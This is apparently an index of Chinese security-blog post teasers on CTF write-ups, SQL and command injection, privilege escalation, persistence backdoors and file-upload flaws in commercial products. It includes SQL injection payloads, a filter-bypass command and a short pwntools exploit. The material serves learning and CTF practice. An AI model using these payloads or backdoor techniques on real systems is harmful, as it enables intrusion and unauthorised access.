1开机启动 1.启动菜单 c:\Users\Administrator(根据当前计算机登陆⽤户名)\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动 2.msconfig 3.注册表regedit： HKEY_CURRENT_USERS/software/Microsoft/Windows/CurrentVersion/Run HKEY_LOCAL_MACHINE/Software…

HCIE——园区网架构

总体流程需求调研 1.客户网络环境： 明确是改造还是新建 2.客户网络业务： 需求部署的业务以及特效 （了解每个部门和其业务） 3.现网的痛点（对网络的期待） 网络速度：是否拥塞网络质量&…

HTTP报头

HTTP协议是什么？ HTTP协议（HyperText Transfer Protocol，超文本传输协议） 是用于从WWW服务器传输超文本到本地浏览器的传送协议。它可以使浏览器更加高效，使网络传输减少。它不仅保证计算机正确快速地传输超文本文档…

buuctf-PYWebsite

东西很多，能操作的只有BUY IT NOW 和输入授权码这里说要付款，我还真就扫了一下又试了下对授权码输入一些代码，也没用再重新看一遍源代码，才发现有东西，之前只注意了开头和结尾 function enc(code){hash hex_md5(…

buuctf-HardSQL

这道题过滤了很多sql注入的关键词（可以用bp,fuzz出来，下次试试） 包括空格，但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入查库名（geek） ?username1or(updatexml(1,concat(0x7…

Less-15,16（布尔盲注）

Less-15 uname1 or 11#&passwd1&submitSubmit 单引号的万能密码可以，双引号不行，所以用单引号闭合正确和错误有区分但不会回显所以可以用布尔盲注用时间盲注测试时不知道为什么会一直加载，不止三秒 uname1 or ascii(left(data…

buuctf-Blacklist

?inject1 order by 2-- 过滤了很多关键词，就有select，好像绕不过试试报错注入 ?inject1 and extractvalue(1,concat(0x7e,(database()),0x7e))-- 数据库：surpersqli 因为过滤了太多，报错注入不了，只能试试别的了…

buuctf-WarmUp

查看源代码，看到source.php 先看这段 if (! empty($_REQUEST[file])&& is_string($_REQUEST[file])&& emmm::checkFile($_REQUEST[file])) {include $_REQUEST[file];exit;} else {echo "<br><img src\"https://i.loli.net/201…

2021年春秋杯网络安全联赛秋季赛传说殿堂赛道misc部分writeup

Misc 问卷调查略 secret_chart 解压出来一张图片，图片后面有个ZIP，手动分离出来之后去看图片发现没有LSB，准备去爆破一下然后就被我爆出来了解压之后发现还真是chart，发现表格是由6个月份构成的，于是乎第一反应就…

SWPU新生赛2021 Pwn部分WriteUp

第一波放题 nc签到不能有’cat’,‘ls’,’ ‘,‘cd’,‘echo’,’<’,’${IFS}’ 这很web 直接绕就行 tac$IFS$1flag gift_pwn ret2text from pwn import * p remote(1.14.71.254,28057) p.sendline(a*(0x108)p64(0x4005b6)) p.interactive()whitegive_pwn ret2li…

SWPU新生赛2021 Misc部分WriteUp

第一波放题你喜欢osu吗？ 打开铺面发现都是重复的操作，于是看铺面文件发现这里的变化可能对的上二进制正好和上次节奏医生的题也对的上，于是将第一行改成这玩意，跑一下写好的脚本发现确实是flag，再reverse一下就…

命令执行(Command Injection)之DVWA演示

一命令执行漏洞的理论基础 01 命令执行漏洞的原理在操作系统中， & 、&& 、| 、 || 都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有对执行函数进行过滤，从而造成可以执行危险命令. Windo…

windows10安装nessus

01 安装nessus 01 安装nessus 02 获取验证码 02 离线安装拓展包 01 找到nessus的快捷方式 02 找到nessus 程序安装目录 03 复制拓展包 04 cmd更新插件 05 刷新nessus 06 登录成功

kali基础命令（二）

文件夹或文本操作 1、显示当前工作路径 pwd2、返回上一级目录 cd ..3、进去当前用户主目录 cd ~4、创建文件 touch test.txt5、创建文件夹 mkdir test6、显示文件和文件夹名 ls 显示文件和文件夹名 ls -a 显示所有的文件和文件夹包含隐藏文件 ls -l 显示文件和目录的详…

Hacker The Box 之Fawn 2

持续更新第二篇........ 第二章也是一共九个问题 nmap -sS 10.129.183.85 发现是开启ftp模式换用nmap -sV 10.129.183.85 可以发现版本信息 21/tcp open ftp vsftpd 3.0.3同上可以发现 Service Info: OS: Unix访问ftp可以进行查阅相关信息由于ftp是可以匿名访问的&…

BugKu杂项题1-5（签到题；这是一张单纯的图片；隐写；telnet；眼见非实）

平台：https://ctf.bugku.com/challenges 1.1杂项题（签到题）： 1.2（这是一张单纯的图片）：保存图片，以十六进制打开，发现末尾有一段unicode码，将其复制&#xf…

【转】Yara 规则

[翻译]编写Yara规则检测恶意软件-外文翻译-看雪论坛-安全社区|安全招聘|bbs.pediy.com

网络安全（黑客）学习路线

前言： 学基础花费很长时间，光语言都有几门，有些人会倒在学习 linux 系统及命令的路上，更多的人会倒在学习语言上； 1、打基础时间太长对于网络安全基础内容，很多人不清楚需要学到什么程度，囫…

使用Hydra和Burp Suite破解在线Web表单密码

步骤1: 打开THC-Hydra 那么，让我们开始吧。启动Kali并打开应用程序中的THC-Hydra - > Kali Linux - >密码攻击 - >在线攻击 - > hydra。步骤2: 获取Web表单参数为了能够破解Web表单用户名和密码，我们需要确定Web表单登录页面的参数以及…

Vault AppRole最佳实现过程

AppRole AppRole身份验证方法允许机器或应用程序使用 Vault 定义的角色进行身份验证。AppRole 的开放式设计支持使用不同的工作流和配置来应对大量应用程序。这种身份验证方法主要是面向自动化工作流程（机器和服务）设计的，对人类操作者不太有用。 “AppRole”代表一组 Vau…

常见的web网络攻击及解决方法

XSS攻击指的是跨站脚本攻击，指的是插入一段JS，用户浏览页面时，它会自动执行实行攻击。攻击者在网页中嵌套，恶意脚本程序，当用户打开网页时，程序开始在浏览器上启动，盗取用户的cooks&#xff0…

【BUUCTF-REVERSE刮开有奖】详解版

这道题是BUUCTF-REVERSE中的一道题目拿到题目我们直接拖到Exeinfo_PE中查看，发现没有加壳，32位应用程序，打开应用程序看看： 打开是这样，我是没有找到编辑框，那直接拖到IDA中打开看看吧： 打开I…

GNS3配置dhcp环境

一、配置说明 GNS3版本：2.2.40.1 二、创建拓扑图图中包含一台msf攻击机，一台带有漏洞的靶机，二者用交换机连接。在最上面有一个路由器。配置msf机器和靶机为dbcp 将dhcp相关内容放开（去掉#注释）。 # # This is a …

怎么才能在5分钟内快速了解网络结构、进行故障定位？

从事网工这行8年，老杨见过不少网工，对他们来说，网络管理真的是一个十分家常便饭的工作。他们需要对网络运行的状态、性能进行监视和测量，出现问题的话，就要马上解决。问题包括但不限于：网络部件出现故障…

旁注、目录越权、跨库、CDN绕过

旁注、目录越权、跨库、CDN绕过旁注原理站点假设没有漏洞，我们可以通过共计服务器上的其他任意站点，这个就是旁注 IP逆向查询可以通过ping域名获取相关IP地址，之后通过IP地址反查获取其旁注的域名 http://tool.chinaz.com/same http:…

编辑器漏洞 EWebedtitor FCKeditor spaw editor

编辑器漏洞简介一般编辑器会嵌入在网站当中，由后台或者前台调用，进行内容的编辑、文件上传。通常，网站的脚本语言和编辑器的脚本语言是相同的，即ASP的站点，其编辑器的脚本语言也是ASP；PHP、JSP、.NET…

命令执行与反序列化

命令执行与反序列化原理设计者在编写代码时没有做严格的安全控制，导致攻击者通过接口或相关参数提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器。 &、|、“ 空格”等组合连接实现只要带参数的地方都可能出现…

CSRF伪造请求攻击

CSRF伪造请求攻击简介在CSRF的攻击场景中攻击者会伪造一个请求（这个请求一般是一个链接），然后欺骗目标用户进行点击，用户一旦点击了这个请求，整个攻击就完成了。所以CSRF攻击也称为"one click"攻击。 C…

任意文件上传

任意文件上传概述大多数网站都有文件上传的接口，但如果在后台开发时没有对上传的文件进行安全考虑或者采用了有缺陷的措施，导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件，从而通过对恶意文件的访问来控制整个后台分类及…

如何用大数据做威胁情报 | 硬创公开课

史中编辑大数据、威胁情报，这两个词汇听起来非常性感。在我们的想象中，掌握大数据的人就像先知和上帝，俯视我们所不能完全理解的事态，精准地预言我们将要面临的危机。然而，对于大数据的利用是非常考验功力和技巧的。…

关于工大讲座的一次收获

2015年7月29日， 我们四个人去了工大。演讲者是珠海国测软件公司的高级工程师。据老师说，他叫宋磊，本科是在科大读的。（每次去听演讲，有些人总会说，他是科大的，或者他是清华的，&…

基于HTTP 无状态特征的cookies劫持实验

HTTP cookies劫持： 首先保证虚拟机中的kali系统能够和外部网络通信,打开编辑-----虚拟网络编辑器器—更改设置----桥接无线网卡模式。左键单击虚拟机----设置-----网络适配器----选择桥接模式-----确定。在kali中将网络设置改为自动（DHCP&#xff…

wirehark数据分析与取证flag.pcap

什么是wireshark？wiresharekflag.pcap数据包数据包下载请私信博主wiresharek Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包，并同时显示出最详细的网络封包数据。Wireshark使用WinPC…

【Linux】iptables防火墙相关配置

【Linux】iptables防火墙相关配置命令格式 # iptables -t 表名 <-A/D/I/R> 规则链名 [规则号] <-i/o 网卡名> -p 协议名 <-s 源IP/源子网> --sport 源端口 <-d 目标IP/目标子网> --dport 目标端口 -j 动作-t：指定要操纵的表-A&#xff1a…

网络安全基于scrapy框架与selenium、openpyxl库爬取国外各国家疫情统计汇总信息

网络安全基于scrapy框架与selenium、openpyxl库爬取国外各国家疫情统计汇总信息数据来源 https://voice.baidu.com/act/newpneumonia/newpneumonia/ 思路由于目标页面中的数据是动态加载出来的，所以直接发起请求得到的响应是不包含任何有用数据的，所…

网络基础--UPnP基本原理

1、简介 UPnP是通用即插即用（Universal Plug and Play）的缩写，主要用于设备的智能互联互通，使用UPnP协议不需要设备驱动程序，它可以运行在目前几乎所有的操作系统平台上，使得在办公室、家庭和其他公共场所…

网络日志采集_企业网络日志对网络安全有哪些帮助作用？

网络日志采集对企业网络安全有哪些帮助？随着互联网安全问题的不断加剧，企业网络安全越来越值得关注。网络陷阱，网络病毒等危害企业网络安全的问题随着互联网的发展变得越来越普遍。加强网络安全防护，规范企业用户网络行为成为目前…

Kali Linux零基础入门到精通

作为一名从事渗透测试的人员，不懂Kali Linux的话，就out了。它他预装了数百种享誉盛名的渗透工具，使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。这套Kali Linux资料合集，包括12份Kali Linux渗透测试PDF资料…

网络安全行业职位解析：如何选择适合自己的职业发展路径？

前言网络安全行业发展迅速，各种职位层出不穷，这给刚入门的小伙伴带来了很大的困惑：我应该选择哪个职位？如何才能在这个行业立足并获得高薪工作？如果你也有这些疑惑，那么恭喜你，来到了正确的地…

密码学：流密码.（对称密码）

密码学：流密码. 流密码(Stream Cipher)属于对称密码算法中的一种，其基本特征是加解密双方使用一串与明文长度相同的密钥流，与明文流组合来进行加解密密钥流通常是由某一确定状态的伪随机数发生器所产生的比特流，双方将伪随机数生…

如何在Windows 10上使用Kali Linux应用程序

Linux操作系统在一些企业中越来越受欢迎。有许多发行版，包括Mint、Ubuntu和Kali。Kali是最著名的Linux发行版之一，渗透测试人员通常使用它。Kali Linux配备了一系列免费的开源软件，成为渗透测试的理想选择。目前，安全专家和渗透测…

超越 Nginx！号称下一代 Web 服务器，用起来够优雅！

Nginx是一款非常流行的Web服务器，在Github上已有16KStar，我们经常用它来做静态资源托管或反向代理。最近发现了一款全新的Web服务器Caddy，Star数超越Nginx，标星38KStar。试用了一下Caddy，发现它使用起来比Nginx优雅多了…

解决APP抓包问题「网络安全」

1.前言在日常渗透过程中我们经常会遇到瓶颈无处下手，这个时候如果攻击者从APP进行突破，往往会有很多惊喜。但是目前市场上的APP都会为防止别人恶意盗取和恶意篡改进行一些保护措施，比如模拟器检测、root检测、APK加固、代码混淆、代码反调试…

电子阅览室管理制度

一、电子阅览室管理制度电子阅览室是学校教育、教学的重要场所，是教师和学生获取知识和信息的重要窗口。应明确专人负责，规范管理。二、管理人员应掌握计算机网络管理技术，能为教师和学生解决操作中遇到的问题。电子阅览室开放期间不能离开…

ctfshow愚人杯web复现

easy_signin 题目url base64解码是face.png，尝试flag.txt和flag.php，base64加密后传入都不对，用index.php加密后传入，看源码将后面的base64解密得到flag 被遗忘的反序列化源码 <?php# 当前目录中有一个txt文件哦 error_r…

内网渗透(六十六)之Kerberos Bronze Bit 漏洞

Kerberos Bronze Bit 漏洞漏洞背景 Kerberos Bronze Bit （CVE-2020-17049）漏洞是国外安全公司Netspi 安全研究员 Jake Karnes 发现的一个Kerberos安全功能绕过漏洞。该漏洞存在的原因在于KDC在确定Kerberos服务票据是否可用于通过Kerberos的约束性委派时，其方式中存在一个…

小白怎么入门网络安全？啃完这篇就够啦！

由于我之前写了不少网络安全技术相关的故事文章，不少读者朋友知道我是从事网络安全相关的工作，于是经常有人在微信里问我： 我刚入门网络安全，该怎么学？要学哪些东西？有哪些方向？怎么选&#xff…

操作系统权限维持（八）之Linux系统-SSHKey后门

系列文章操作系统权限维持（一）之Windows系统-粘贴键后门操作系统权限维持（二）之Windows系统-克隆账号维持后门操作系统权限维持（三）之Windows系统-启动项维持后门操作系统权限维持（四&…

ToBeWritten之物联网 BlueTooth/BLE 协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

使用python制作一个简易的远控终端

使用python制作一个简易的远控终端远控终端的本质 1、服务端(攻击者)传输消息 ----> socket连接 ----> 客户端(被攻击者)接收消息 2、客户端执行消息内容(即执行服务端传回来的命令) 3、客户端传输执行结果 ----> socket连接 ----> 服务端显示命令执行结果pytho…

程序员的这些冷笑话，你能看懂几个？

以下内容整合自网络，侵删 1、网站网址 “小李，我们街道的网站做好了吗？” “主任，网站建好了，需要申请网址，网址是什么？” 主任打开百度查了下说，“url” 小李说：“…

T Wiki 云安全知识库 5 月份更新汇总

前言 T Wiki 在 4 月 16 日上线，5 月份以来依然收到不少师傅的支持与反馈，此时正好到月末，特此整理下这段时间来 T Wiki 上所更新的内容，如果你还不知道 T Wiki 是什么，可以查看这篇文章T Wiki 云安全知识文库上线&am…

【内网学习笔记】27、Kerberos 域用户提权漏洞

0、前言在 2014 年微软修复了 Kerberos 域用户提权漏洞，即 MS14-068，CVE 编号为 CVE-2014-6324，该漏洞影响了 Windows Server 2012 R2 以下的服务器，该漏洞允许 RT 将任意用户权限提升至域管级别。不过从漏洞年代就知道这已经…

【内网学习笔记】25、Exchange 邮件服务器

1、Exchange 的基本操作在 Exchange 服务器上的 PowerShell 里进行以下操作将 Exchange 管理单元添加到当前会话中 add-pssnapin microsoft.exchange*查看邮件数据库 Get-MailboxDatabase -server "dc"查询数据库的物理路径 Get-MailboxDatabase -Identity Mail…

【内网学习笔记】23、SMBExec 与 DCOM 的使用

1、SMBExec 利用 SMBExec 可以通过文件共享（admin$、c$、ipc$、d$）在远程系统中执行命令，它的工作方式类似于 PsExec C 版 C 版项目地址：https://github.com/sunorr/smbexec 一看这个项目是 8 年前上传的了，然后试…

信息收集（六）之绕过CDN查找真实IP-part1

一、简介目前很多网站使用了cdn服务，用了此服务可以隐藏服务器的真实IP，加速网站静态文件的访问， 而且你请求网站服务时，cdn服务会根据你所在的地区，选择合适的线路给予你访问，由此达网站加速的效果&…

burpsuite安装和java环境

1. Java环境安装 1.1 进入官网，找到8u321进行下载 （Java环境和burp安装包我压缩在一起了，也可以用我的） https://www.oracle.com/java/technologies/downloads/#java8-windows 1.2 运行.exe文件，不用什么操作&…

【图解RSA加密算法】RSA非对称密码算法的Python实现保姆级教程 | 物联网安全 | 信息安全

系列索引：【图解安全加密算法】加密算法系列索引 Python保姆级实现教程 | 物联网安全 | 信息安全文章目录一、什么是RSA加密算法二、RSA算法原理三、具体要求四、代码实现五、实验结果与心得体会一、什么是RSA加密算法 RSA加密算法是一种非对称加密算法。在公开密…

Hacker The Box 之 Oopsie 9

填空题第一题第二题第三题第四题第五题第六题第七题第八题第九题第十题第十一题第十二题操作注意：我这机器的IP用了两个， 第一个10.129.226.120。第二个10.129.228.3。 （中途吃个饭，openvpn断了，…

Python find()函数使用详解

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：小白零基础《Python入门到精通》 find 1、指定检索位置2、参数为负数3、超出范围3、find()和index()的区别&#x…

pwnlab_init靶场记录

一、环境说明目标：得到root权限&找到flag.txt 靶场下载地址：https://www.vulnhub.com/entry/pwnlab-init,158/ 靶机IP：192.168.252.134 KaliIP：192.168.252.132 二、练习记录扫描端口。 nmap -p 1-65535 -T4 -sT 192.…

反制Goby扫描之XSS点击上线

反制Goby扫描之XSS点击上线1.测试环境2.XSS测试3.CS上线最近看到有大佬利用goby漏洞反制攻击者，特意复现下，原理就是通过XSS进行交互，调用Node.js函数exec执行命令，最新版本已经进行了修复，如果还在使用低版本还是尽快…

海康威视iVMS综合安防系统任意文件上传(0Day)

漏洞描述攻击者通过请求/svm/api/external/report接口任意上传文件，导致获取服务器webshell权限，同时可远程进行恶意代码执行。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和…

简单网络-跨网段通信

跨网段通信 1.为PC1，PC2配置IP地址、子网掩码和网关后用PC1 ping PC2，并用wireshark抓包g0/0/2的数据包。结果发现不能ping通，而PC1在发送广播包，寻找10.0.1.254网关，说明PC1找不到网关 2.给路由器e0/0/0端口配置网关1…

接口和API

文章目录接口是什么？API是什么？总结接口是什么？ 接口是指定一组函数成员而不实现成员的引用类型，其他类型-类和结构可以实现接口。接口是对强类型的面向对象编程语言特有东西，如C#,Java，通俗地说它的出现…

联邦学习之差分隐私

联邦学习过程联邦学习以轮为单位，每个轮内包含模型分发、本地训练和全局更新这3个阶段。 1. 模型分发在模型分发阶段，服务器按照一定标准，选择参与本轮联邦学习的设备，例如下图中选中了3个设备，向它们分发全局模型。…

CVE漏洞复现-CVE-2021-3493 Linux 提权内核漏洞

CVE-2021-3493 Linux 提权内核漏洞漏洞描述 CVE-2021-3493 用户漏洞是 Linux 内核中没有文件系统中的 layfs 中的 Ubuntu over 特定问题，在 Ubuntu 中正确验证有关名称空间文件系统的应用程序。buntu 内核代码允许低权限用户在使用 unshare() 函数创建的用户命名…

CVE漏洞复现-CVE-2021-22555 Linux Netfilter 权限提升漏洞

CVE-2021-22555 Linux Netfilter 权限提升漏洞漏洞描述近日，互联网公开了Linux Netfilter权限提升漏洞的POC及EXP，相关CVE编号：CVE-2021-22555。该漏洞在kCTF中被用于攻击kubernetes pod容器实现虚拟化逃逸，该漏洞已在Linux内…

网络安全—黑客技术【自学】

一、黑客是什么原是指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。但后来，黑客一词已被用于泛指那些专门利用电脑网络搞破坏或者恶作剧的家伙。二、学习黑客技术的原因其实，网络信息空间安全已经成为海陆空之…

网神 SecGate 3600 防火墙任意文件上传漏洞复现(HW0day）

0x01 产品简介网神SecGate3600下一代极速防火墙（NSG系列）是基于完全自主研发、经受市场检验的成熟稳定网神第三代SecOS操作系统并且在专业防火墙、VPN、IPS的多年产品经验积累基础上精心研发的高性能下一代防火墙专门为运营商、政府、军队、教育、大型…

用友移动管理系统任意文件上传漏洞复现（HW0day）

0x01 产品简介用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。 0x02 漏洞概述用友移动管理系统 uploa…

如何自学（黑客）网络安全

前言： 想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“…

用友-NC-Cloud远程代码执行漏洞[2023-HW]

用友-NC-Cloud远程代码执行漏洞[2023-HW] 一、漏洞介绍二、资产搜索三、漏洞复现PoC小龙POC检测脚本: 四、修复建议免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#…

[LitCTF 2023]1zjs

这里一点想法没有看看源代码查找flag没有发现查找.php 有所发现看起来是一种加密方式，查找 jsfuck NSSCTF{bd1[]f7[]3[]c8[]-9[]c5[]c-4[]c6[]4[]-a7[]2[]7[]-6[]7[]3[]b4[]4[]2[]6[]efbc}

Vulnhub: DriftingBlues: 3靶机

kali：192.168.111.111 靶机：192.168.111.192 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.192 查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html 查看littlequeenofspades.html源码 base64解密…

网络安全（自学）

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全…

Jay17 2023.8.14日报即留校集训阶段性总结

8.14 打了moeCTF，还剩一题ak Web。 Jay17-集训结束阶段性总结： 集训产出： 自集训开始以来一个半月，最主要做的事情有三。一是跟课程，复习学过的知识，学习新的知识；目前课程已大体听完&…

代码审计-Java项目审计-SQL注入漏洞

代码审计必备知识点： 1、代码审计开始前准备： 环境搭建使用，工具插件安装使用，掌握各种漏洞原理及利用,代码开发类知识点。 2、代码审计前信息收集： 审计目标的程序名，版本，当前环境(系统,中间件…

Coremail参与编制|《信创安全发展蓝皮书——系统安全分册（2023年）》

信创安全发展蓝皮书近日，Coremail参与编制的《信创安全发展蓝皮书—系统安全分册（2023年）》重磅发布。此次信创安全发展蓝皮书由工业和信息化部电子第五研究所联合大数据协同安全技术国家工程研究中心重磅共同发布。本次蓝皮书涵盖信创系…

初识网络原理（笔记）

目录编辑局域网网络通信基础 IP 地址端口号协议协议分层 TCP / IP 五层网络模型网络数据传输的基本流程发送方的情况： 接收方的情况局域网搭建网络的时候，需要用到交换机和路由器路由器上，有 lan 口和 wan 口虽…

中远麒麟堡垒机 SQL注入漏洞复现

0x01 产品简介中远麒麟依托自身强大的研发能力,丰富的行业经验，自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控，消除了传统运维过程中…

混杂接口模式---vlan

策略在两个地方可以用--1、重发布 2、bgp邻居 2、二层可以干的，三层也可以干 3、未知单播：交换机的MAC地址表的记录保留时间是5分钟，电脑的ARP表的记录保留时间是2小时 4、route recursive-lookup tunnel 华为默认对于bgp学习来的路由不开启标…

零基础自学网络安全，就是这样简单！

建议一：黑客七个等级黑客，对很多人来说充满诱惑力。很多人可以发现这门领域如同任何一门领域，越深入越敬畏，知识如海洋，黑客也存在一些等级，参考知道创宇 CEO ic（世界顶级黑客团队 0x557 成员…

Hook免杀实战: 去除杀软的三环钩子

Hook的概念什么是Hook Hook（也被称为“挂钩子”）是一种程序设计模式，它提供了一种方式去截获（或者“挂钩子”在）系统级别或者应用级别的函数调用、消息、事件等。通过使用Hook，开发者可以在不修改源程序…

黑客自学路线

谈起黑客，可能各位都会想到：盗号，其实不尽然；黑客是一群喜爱研究技术的群体，在黑客圈中，一般分为三大圈：娱乐圈技术圈职业圈。娱乐圈：主要是初中生和高中生较多，玩网恋…

网络安全（黑客）入门

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全…

易思智能物流无人值守系统文件上传漏洞

易思智能物流无人值守系统文件上传漏洞一、产品简介二、漏洞概述三、影响范围四、复现环境五、漏洞复现小龙poc检测六、修复建议免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接…

为什么选择网络安全？为什么说网络安全是IT行业最后的红利？

一、为什么选择网络安全？ 这几年随着我国《国家网络空间安全战略》《网络安全法》《网络安全等级保护2.0》等一系列政策/法规/标准的持续落地，网络安全行业地位、薪资随之水涨船高。未来3-5年，是安全行业的黄金发展期，提前踏入…

网络安全—黑客技术（学习笔记）

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

BUUCTF [安洵杯 2019]easy_serialize_php 1 详细讲解

题目来自buuctf，这是一题关于php序列化逃逸的题 1. 题目题目给出的代码 <?php$function $_GET[f];function filter($img){$filter_arr array(php,flag,php5,php4,fl1g);$filter /.implode(|,$filter_arr)./i;return preg_replace($filter,,$img); }if($_S…

Coremail AI实验室：利用高级语境和视觉智能进行钓鱼邮件检测

在这个日益数字化的时代，对电子邮件安全需求是至关重要的。新兴的高级威胁邮件：应用社工技术的钓鱼邮件，仿冒公检法的钓鱼邮件等等，都需要更高级的防御策略。 Coremail邮件安全人工智能实验室，整合了高级文本语境理解和…

2023年度漏洞预警

1 漏洞漏洞是硬件，软件，协议的具体实现或系统安全策略上存在的缺陷。从而可以使用攻击者能够在破坏系统。 2 漏洞汇总数据以下数据针对 23 年截至8月期间爆发的高危严重漏洞进行了数据统计和分析， 具体的数据如下所示： 漏洞…

渗透测试-SQL注入原理

文章目录 sql注入原理sql注入基本流程判断是否存在注入，是否会将用户输入拼接到sql语句，并当做代码执行判断字段数判断显错位判断库名判断表名判断列名判断具体数据 sql注入原理 sql注入基本流程判断是否存在注入，是否会将用户输入拼接到sql…

代码审计-java项目-组件漏洞审计

代码审计必备知识点： 1、代码审计开始前准备： 环境搭建使用，工具插件安装使用，掌握各种漏洞原理及利用,代码开发类知识点。 2、代码审计前信息收集： 审计目标的程序名，版本，当前环境(系统,中间件…

【CTF-web】bugku-成绩查询（sql注入）

题目链接：https://ctf.bugku.com/challenges/detail/id/84.html 判断注入点查看网页源码可知输入数据通过POST发送到index.php并显示出查询结果，可能需要sql注入。如上图所示，当id为1时返回名字为“龙龙龙”的成绩单。再测试&#xff0c…

网络安全/黑客技术（就业前景与经验分享）

网络安全与我们每一个人都息息相关，无论是企业还是个人，现在都非常重视网络安全。而且网络安全是一个新兴的行业，人才需求量远远大于供给，所以在薪资福利上具有很大的优势，并且对于初学者而言，很多人依旧担…

【系统工具】开源服务器监控工具WGCLOUD初体验

经常看到服务器上传下载流量一直在跑，也不知道是啥软件在偷偷联网~~~官网地址：www.wgstart.com，个人使用是免费的。 WGCLOUD官网介绍 "WGCLOUD支持主机各种指标监测（cpu使用率，cpu温度，内存使用率&am…

vulnhub Seattle-0.0.3

环境：vuluhub Seattle-0.0.3 1.catelogue处任意文件下载(目录穿越) http://192.168.85.139/download.php?item../../../../../../etc/passwd 有个admin目录，可以下载里面的文件进行读取 2.cltohes详情页面处(参数prod)存在sql报错注入 http://192.16…

kali搭建vulhub漏洞靶场

安装kali 下载kali作为虚拟环境， Get Kali | Kali Linux 通过vmvare打开，默认账号密码kali/kali 修改root密码 su passwd root 如果一些配置普通用户做不了就切换kali，或sudo 命令 kali配置 apt换源 echo > /etc/apt/sources.list v…

渗透测试面试题汇总（附答题解析+配套资料）

注：所有的资料都整理成了PDF，面试题和答案将会持续更新，因为无论如何也不可能覆盖所有的面试题。一、思路流程 1、信息收集 a、服务器的相关信息（真实ip，系统类型，版本，开放端口，…

Ctfshow web入门权限维持篇 web670-web679 详细题解全

CTFshow 权限维持 web670【】补充一下PHP中单双引号的区别： 单引号和双引号之间最显着的区别在于我们插入字符串和变量时。单引号不插入字符串和变量。**单引号内的内容会按原样打印出来。**在大多数情况下，单引号内没有任何变量或转义序列的编译。 …

透视俄乌网络战之一：数据擦除软件

数据擦除破坏 1. WhisperGate2. HermeticWiper3. IsaacWiper4. WhisperKill5. CaddyWiper6. DoubleZero7. AcidRain8. RURansom 数据是政府、社会和企业组织运行的关键要素。数据擦除软件可以在不留任何痕迹的情况下擦除数据并阻止操作系统恢复摧，达到摧毁或目标系统…

Roxy-Wi 命令执行漏洞复现

漏洞描述 Roxy-WI是开源的一款用于管理 Haproxy、Nginx 和 Keepalived 服务器的 Web 界面 Roxy-WI 6.1.1.0 之前的版本存在安全漏洞，该漏洞源于系统命令可以通过 subprocess_execute 函数远程运行，远程攻击者利用该漏洞可以执行远程代码。免责声明技术文章仅供参考，任…

【Call for papers】2023-2024网络安全四大顶会（CCS/NDSS/SP/Usenix Security）截稿日期汇总

文章目录 CCS-2023NDSS-2024S&P-2024Usenix Security-2024 CCS-2023 The 30th ACM Conference on Computer and Communications Security (CCS) seeks submissions presenting novel contributions related to all real-world aspects of computer security and privacy. …

漏洞指北-VluFocus靶场专栏-工具篇

漏洞指北-VluFocus靶场专栏-番外篇奇技淫巧 🌸1、burp suite 、中国蚁剑工具、Strut2扫描软件地址🌸🌸2、burp suite使用🌸step1 浏览器开启代理，**推荐使用：SwitchyOmega** step2 确认浏览器端口和burp su…

Vulnhub: DriftingBlues: 2靶机

kali：192.168.111.111 靶机：192.168.111.207 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.207 80端口的/blog目录为wordpress wpscan收集wordpress用户和爆破密码 wpscan --url http://driftingblues.box/blog -e…

漏洞指北-VulFocus靶场专栏-初级01

漏洞指北-VulFocus靶场专栏-初级初级001 🌸海洋CMS代码执行（CNVD-2020-22721🌸step1：进入后台页面账号密码：admin amdinstep2：点击系统，点击后台IP安全设置,关闭step3 启动burpsuite&#xff…

漏洞指北-VulFocus靶场专栏-初级02

漏洞指北-VulFocus靶场02-初级初级005 🌸phpunit 远程代码执行 (CVE-2017-9841)🌸step1：进入漏洞页step2： burpsuite 抓包,等待请求页，获得flag 初级006 🌸splunk 信息泄露 （CVE-2018-11409&am…

攻防世界-easyphp

